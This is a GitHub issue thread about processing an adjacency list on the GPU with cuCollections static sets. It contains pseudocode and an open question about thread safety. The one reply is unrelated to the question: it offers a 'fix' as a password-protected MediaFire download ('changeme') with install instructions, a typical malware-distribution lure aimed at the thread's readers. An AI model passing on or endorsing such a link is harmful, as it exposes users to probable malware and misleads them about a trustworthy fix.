### ISSUE TITLE
implement processing of the adjacency list on the GPU

### ISSUE THREAD

**Issue by HugoPhibbs** [HugoPhibbs/GS-DBSCAN-CPP#39]
Is this even possible to do in a highly parallelised manner?

Possible to do this with CuCollections?

Advantage is that this keeps all the data structure on the GPU

Can be done with:

```
all_data_sets = list of n static_sets

for point in dataset:
 start index = ...
 go through adjacency list and find the adjacent vectors
 insert adjacent vectors into: the static set for this point, and the static set for the other point
```

A cuCollections static set for each of the points in the dataset

open question is whether the static sets are thread safe

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
